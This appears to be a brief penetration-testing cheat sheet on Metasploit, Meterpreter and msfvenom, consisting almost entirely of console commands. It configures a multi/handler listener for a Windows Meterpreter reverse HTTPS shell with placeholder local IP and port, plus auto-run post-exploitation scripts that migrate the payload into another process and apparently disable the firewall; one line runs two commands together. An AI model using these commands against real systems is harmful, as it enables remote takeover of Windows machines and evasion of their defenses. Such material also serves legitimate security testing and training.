Metasoloit & Meterpreter & msfvenom
Last updated
Last updated
msf > use exploit/multi/handler
msf (handler) > set AutoRunScript multi_console_command -rc /root/mycommands.rb
<!-- The contents of /root/mycommands.rb include: -->
root@kali# cat /root/mycommands.rb
run post/windows/manage/smart_migrate
run post/windows/manage/killfwmsf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_https
msf>set AutoRunScript post/windows/manage/migrate
msf>set lhost <local IP>
msf> set lport <local port>
msf>exploit